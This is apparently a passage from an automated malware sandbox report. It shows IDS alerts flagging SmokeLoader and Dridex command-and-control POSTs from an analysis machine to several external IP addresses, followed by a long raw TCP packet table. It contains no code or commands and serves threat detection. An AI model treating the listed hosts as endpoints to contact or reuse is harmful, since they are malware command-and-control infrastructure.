                                                                      2024-09-25T16:02:20.659998+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.162443192.168.2.549741TCP
                                                                      2024-09-25T16:02:21.806634+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974223.145.40.162443TCP
                                                                      2024-09-25T16:02:22.175887+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974223.145.40.162443TCP
                                                                      2024-09-25T16:02:22.789674+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974323.145.40.162443TCP
                                                                      2024-09-25T16:02:23.074361+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974323.145.40.162443TCP
                                                                      2024-09-25T16:02:23.667347+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974423.145.40.162443TCP
                                                                      2024-09-25T16:02:23.949540+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974423.145.40.162443TCP
                                                                      2024-09-25T16:02:24.558695+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974523.145.40.162443TCP
                                                                      2024-09-25T16:02:24.991989+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974523.145.40.162443TCP
                                                                      2024-09-25T16:02:25.615628+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974623.145.40.162443TCP
                                                                      2024-09-25T16:02:25.892849+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974623.145.40.162443TCP
                                                                      2024-09-25T16:02:26.570388+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974723.145.40.162443TCP
                                                                      2024-09-25T16:02:26.856911+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974723.145.40.162443TCP
                                                                      2024-09-25T16:02:27.541564+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974823.145.40.162443TCP
                                                                      2024-09-25T16:02:27.820364+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974823.145.40.162443TCP
                                                                      2024-09-25T16:02:28.599198+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974923.145.40.162443TCP
                                                                      2024-09-25T16:02:28.922723+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974923.145.40.162443TCP
                                                                      2024-09-25T16:02:29.775443+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54975023.145.40.162443TCP
                                                                      2024-09-25T16:02:30.052893+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54975023.145.40.162443TCP
                                                                      2024-09-25T16:02:36.401964+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54975123.145.40.162443TCP
                                                                      2024-09-25T16:02:36.940781+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54975123.145.40.162443TCP
                                                                      2024-09-25T16:03:21.252704+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549752116.58.10.6080TCP
                                                                      2024-09-25T16:03:31.755722+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549753116.58.10.6080TCP
                                                                      2024-09-25T16:03:45.252831+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549754116.58.10.6080TCP
                                                                      2024-09-25T16:03:53.184311+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54975523.145.40.162443TCP
                                                                      2024-09-25T16:03:53.528263+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54975523.145.40.162443TCP
                                                                      2024-09-25T16:04:04.585527+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549756190.98.23.15780TCP
                                                                      2024-09-25T16:04:13.856339+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54975723.145.40.162443TCP
                                                                      2024-09-25T16:04:14.335519+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54975723.145.40.162443TCP
                                                                      2024-09-25T16:04:26.957735+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549758190.98.23.15780TCP
                                                                      2024-09-25T16:04:36.813735+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54975923.145.40.162443TCP
                                                                      2024-09-25T16:04:37.139984+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54975923.145.40.162443TCP
                                                                      2024-09-25T16:04:50.039241+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549760190.98.23.15780TCP
                                                                      2024-09-25T16:04:59.137001+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54976123.145.40.162443TCP
                                                                      2024-09-25T16:04:59.516202+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54976123.145.40.162443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 25, 2024 16:01:29.708235979 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:29.713125944 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:29.713243961 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:29.713839054 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:29.713872910 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:29.720551014 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:29.720719099 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.964297056 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.964448929 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.964560032 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.965774059 CEST4971180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.969006062 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.970510960 CEST8049711116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.973794937 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.973973036 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.973973989 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.973973989 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:30.978746891 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:30.978801012 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.199060917 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.199235916 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.199413061 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.199691057 CEST4971280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.204543114 CEST8049712116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.209014893 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.213887930 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.214025021 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.214114904 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.214138985 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:32.219048023 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:32.219098091 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.463205099 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.468080044 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.468152046 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.468240023 CEST4971380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.471951962 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.473548889 CEST8049713116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.476891994 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.476962090 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.477191925 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.477210045 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:33.482079983 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:33.482172966 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.746088982 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.746104002 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.746161938 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.746299982 CEST4971480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.749664068 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.751247883 CEST8049714116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.754587889 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.754698992 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.754909039 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.754909039 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:34.759975910 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:34.760178089 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015013933 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015208960 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.015286922 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.015357018 CEST4971580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.018661976 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.020117998 CEST8049715116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.023533106 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.023660898 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.023788929 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.023788929 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:36.028553963 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:36.028866053 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606019020 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606595039 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.606648922 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.606688976 CEST4971680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.611565113 CEST8049716116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.615006924 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.619882107 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.619982958 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.620239973 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.620268106 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:37.625103951 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:37.625114918 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026094913 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026115894 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.026226997 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.026370049 CEST4971780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.029406071 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.031152964 CEST8049717116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.034190893 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.034276009 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.034404993 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.034416914 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:39.039153099 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:39.039333105 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325072050 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325346947 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.325429916 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.325489044 CEST4971880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.328349113 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.330543041 CEST8049718116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.333430052 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.333511114 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.333619118 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.333642960 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:40.338443995 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:40.338465929 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599371910 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599498987 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.599554062 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.599639893 CEST4971980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.603055000 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.606756926 CEST8049719116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.607847929 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.607949018 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.608059883 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.608084917 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:41.613718987 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:41.614846945 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.873982906 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.875327110 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.875380993 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.875427008 CEST4972080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.880222082 CEST8049720116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.883331060 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888243914 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.888326883 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888470888 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.888525009 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:42.893472910 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:42.893485069 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128271103 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128911972 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.128985882 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.129065990 CEST4972180192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.131469965 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.134546041 CEST8049721116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.136485100 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.136558056 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.136698008 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.136732101 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:44.142019033 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:44.142137051 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386388063 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386478901 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.386548996 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.389522076 CEST4972280192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.394318104 CEST8049722116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.514379978 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519304991 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.519372940 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519504070 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.519610882 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:45.524274111 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:45.524379969 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.758783102 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.759051085 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.759129047 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.759294987 CEST4972380192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.762048006 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.764055014 CEST8049723116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.766901970 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.769692898 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.769692898 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.769721985 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:46.774609089 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:46.774667978 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049710035 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049730062 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.049798012 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.050018072 CEST4972480192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.054842949 CEST8049724116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.055771112 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060625076 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.060698986 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060842991 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.060877085 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:48.067914963 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:48.067926884 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324126959 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324282885 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.324357986 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.324455023 CEST4972580192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.329265118 CEST8049725116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.333760977 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.338932991 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.339008093 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.339158058 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.339195013 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:49.345532894 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:49.345547915 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.595983982 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.596034050 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.596093893 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.596235037 CEST4972680192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.598862886 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.601037025 CEST8049726116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.603672028 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.603748083 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.603841066 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.603859901 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:50.608582973 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:50.608712912 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.860969067 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.861020088 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.861068964 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.862776041 CEST4972780192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.867598057 CEST8049727116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.868125916 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873006105 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.873095989 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873326063 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.873358011 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:51.878233910 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:51.878246069 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130346060 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130372047 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.130511999 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.130781889 CEST4972880192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.133506060 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.135512114 CEST8049728116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.138412952 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.138514996 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.138679028 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.138693094 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:53.143471956 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:53.143522978 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403583050 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403647900 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.403704882 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.405524969 CEST4972980192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.410391092 CEST8049729116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.415508986 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420423985 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.420528889 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420666933 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.420680046 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:54.425427914 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:54.425559998 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668787956 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668827057 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:55.668994904 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:55.669234991 CEST4973080192.168.2.5116.58.10.60
                                                                      Sep 25, 2024 16:01:55.671477079 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.671547890 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:55.671643019 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.672035933 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:55.672055006 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:55.674132109 CEST8049730116.58.10.60192.168.2.5
                                                                      Sep 25, 2024 16:01:56.319545031 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.319708109 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.329772949 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.329792976 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.330130100 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.337883949 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.383395910 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538494110 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538516998 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.538578987 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.538603067 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.589565992 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.625019073 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.625044107 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.625176907 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.625700951 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.625720024 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.625762939 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.625785112 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.626422882 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.626508951 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.628056049 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.628133059 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.711734056 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.711834908 CEST49731443192.168.2.523.145.40.164
                                                                      Sep 25, 2024 16:01:56.711843967 CEST4434973123.145.40.164192.168.2.5
                                                                      Sep 25, 2024 16:01:56.711877108 CEST4434973123.145.40.164192.168.2.5
